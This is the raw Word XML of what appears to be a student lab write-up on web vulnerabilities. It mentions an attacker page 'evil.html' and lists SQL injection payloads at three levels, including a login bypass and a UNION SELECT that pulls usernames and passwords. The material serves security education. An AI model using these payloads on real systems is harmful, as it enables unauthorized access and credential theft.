            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="85014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40830" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C113BC3" w14:textId="77777777" w:rsidR="0025545C" w:rsidRDefault="0025545C" w:rsidP="00086E4A"/>
    <w:p w14:paraId="60FC16D6" w14:textId="40DAC49E" w:rsidR="0025545C" w:rsidRDefault="0025545C" w:rsidP="00086E4A">
      <w:r w:rsidRPr="00BC04BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>On attacker-site terminal:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0025545C">
        <w:t>localhost:8000/evil.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE54137" w14:textId="2DB179BF" w:rsidR="0025545C" w:rsidRDefault="0025545C" w:rsidP="00086E4A">
      <w:r w:rsidRPr="0025545C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C986F47" wp14:editId="12704178">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="7002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1065" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D71B72F" w14:textId="77777777" w:rsidR="0025545C" w:rsidRDefault="0025545C" w:rsidP="00086E4A"/>
    <w:p w14:paraId="15CACE83" w14:textId="7B9A780B" w:rsidR="0025545C" w:rsidRDefault="0025545C" w:rsidP="00BC04BD">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="00BC04BD">
        <w:t>-Injection</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F376D" w14:textId="283D242A" w:rsidR="0025545C" w:rsidRPr="00BC04BD" w:rsidRDefault="0025545C" w:rsidP="00086E4A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC04BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1)</w:t>
      </w:r>
      <w:r w:rsidR="00BC04BD" w:rsidRPr="00BC04BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Easy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2D1BB9" w14:textId="653A5A1D" w:rsidR="00BC04BD" w:rsidRDefault="00BC04BD" w:rsidP="00BC04BD">
      <w:r>
        <w:t>In login page:</w:t>
      </w:r>
      <w:r w:rsidRPr="00BC04BD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Username: ' OR '1'='1' -- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B94816" w14:textId="1F34DFB7" w:rsidR="00BC04BD" w:rsidRDefault="00BC04BD" w:rsidP="00BC04BD">
      <w:r>
        <w:t xml:space="preserve">                             Password: x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0AE410" w14:textId="25D41D7B" w:rsidR="0025545C" w:rsidRDefault="0025545C" w:rsidP="00086E4A">
      <w:r w:rsidRPr="0025545C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="557BC3A9" wp14:editId="0C08FC5F">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="210277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72868" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6FA07F" w14:textId="7ADA76AC" w:rsidR="0025545C" w:rsidRPr="00BC04BD" w:rsidRDefault="0025545C" w:rsidP="00086E4A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC04BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2)</w:t>
      </w:r>
      <w:r w:rsidR="00F6065B" w:rsidRPr="00BC04BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Intermediate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D48ECEF" w14:textId="00A83945" w:rsidR="0025545C" w:rsidRDefault="00F6065B" w:rsidP="00086E4A">
      <w:r>
        <w:t xml:space="preserve">In lookup: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6065B">
        <w:t>admin' AND '1'='1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C21C2A" w14:textId="6EC9D5B0" w:rsidR="0025545C" w:rsidRDefault="0025545C" w:rsidP="00086E4A">
      <w:r w:rsidRPr="0025545C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5017BCA5" wp14:editId="6E515C50">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="202799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97757" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E55A46" w14:textId="77777777" w:rsidR="0025545C" w:rsidRDefault="0025545C" w:rsidP="00086E4A"/>
    <w:p w14:paraId="086E0C05" w14:textId="77777777" w:rsidR="00BC04BD" w:rsidRDefault="00BC04BD" w:rsidP="00086E4A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D56D076" w14:textId="049FFB08" w:rsidR="0025545C" w:rsidRPr="00BC04BD" w:rsidRDefault="0025545C" w:rsidP="00086E4A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BC04BD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3)</w:t>
      </w:r>
      <w:r w:rsidR="00F6065B" w:rsidRPr="00F6065B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Advanced</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C65962" w14:textId="10D3ED7E" w:rsidR="0025545C" w:rsidRDefault="00F6065B" w:rsidP="00086E4A">
      <w:r>
        <w:t xml:space="preserve">In search box: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F6065B">
        <w:t>' UNION SELECT username, password FROM users--</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D29B1C7" w14:textId="08453CFB" w:rsidR="0025545C" w:rsidRPr="00086E4A" w:rsidRDefault="00F6065B" w:rsidP="00086E4A">
      <w:r w:rsidRPr="00F6065B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63412067" wp14:editId="1986AAC9">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="36508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82031" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3343275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0025545C" w:rsidRPr="00086E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41124"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AC50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30647"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DEEEC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884CEB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4BFEC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61412A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="791A7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8860072">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="594484209">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1958178247">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1936354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C87"/>
    <w:rsid w:val="0002174F"/>
    <w:rsid w:val="00054206"/>
    <w:rsid w:val="00086E4A"/>
    <w:rsid w:val="000B18B8"/>
    <w:rsid w:val="00125F01"/>
    <w:rsid w:val="001C6683"/>
    <w:rsid w:val="0025545C"/>
    <w:rsid w:val="00295F0A"/>
    <w:rsid w:val="002C1633"/>
    <w:rsid w:val="002D7872"/>
    <w:rsid w:val="002F3217"/>
    <w:rsid w:val="00381CEE"/>
    <w:rsid w:val="0038206F"/>
    <w:rsid w:val="004077C4"/>
    <w:rsid w:val="004D7E08"/>
    <w:rsid w:val="004E3F02"/>
    <w:rsid w:val="00532C6A"/>
    <w:rsid w:val="00584C3E"/>
    <w:rsid w:val="005A6B41"/>
    <w:rsid w:val="0067150A"/>
    <w:rsid w:val="006F2DBD"/>
    <w:rsid w:val="006F3B90"/>
    <w:rsid w:val="007B5B6F"/>
    <w:rsid w:val="007D1C87"/>
    <w:rsid w:val="007F64C3"/>
    <w:rsid w:val="008046D7"/>
    <w:rsid w:val="00925D20"/>
    <w:rsid w:val="00977A0A"/>
    <w:rsid w:val="009D4A99"/>
    <w:rsid w:val="00AD5D1F"/>
    <w:rsid w:val="00B240CF"/>
    <w:rsid w:val="00B52EBE"/>
    <w:rsid w:val="00BC04BD"/>
    <w:rsid w:val="00BC6B8E"/>
    <w:rsid w:val="00C260F2"/>
    <w:rsid w:val="00C94E2A"/>
    <w:rsid w:val="00CA023C"/>
    <w:rsid w:val="00CF00B5"/>
    <w:rsid w:val="00DA1198"/>
    <w:rsid w:val="00DC5EEC"/>
    <w:rsid w:val="00EA3B0E"/>
    <w:rsid w:val="00EB0511"/>
    <w:rsid w:val="00F47486"/>
    <w:rsid w:val="00F6065B"/>
    <w:rsid w:val="00F610F7"/>
    <w:rsid w:val="00FE7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294A4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{297D5EBA-B404-4BBA-A28E-5239134F8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1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1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C87"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="007D1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C87"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="007D1C87"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="007D1C87"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="007D1C87"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="007D1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C87"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="007D1C87"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="00086E4A"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00295F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3">
    <w:name w:val="Grid Table 2 Accent 3"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="47"/>
    <w:rsid w:val="00295F0A"/>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5Dark-Accent6">
    <w:name w:val="Grid Table 5 Dark Accent 6"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="50"/>
    <w:rsid w:val="00295F0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4-Accent6">
    <w:name w:val="Grid Table 4 Accent 6"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="49"/>
    <w:rsid w:val="00295F0A"/>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TotalTime>
  <Pages>19</Pages>
  <Words>1051</Words>
  <Characters>5992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Wahab</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Abdul Wahab</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-19T05:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-20T13:55:00Z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ba0e80acc9510ad2ad5bc799de560f3aefcd8d4479185f59d0bb07a8df5d4370</vt:lpwstr>
  </property>
</Properties>
</file>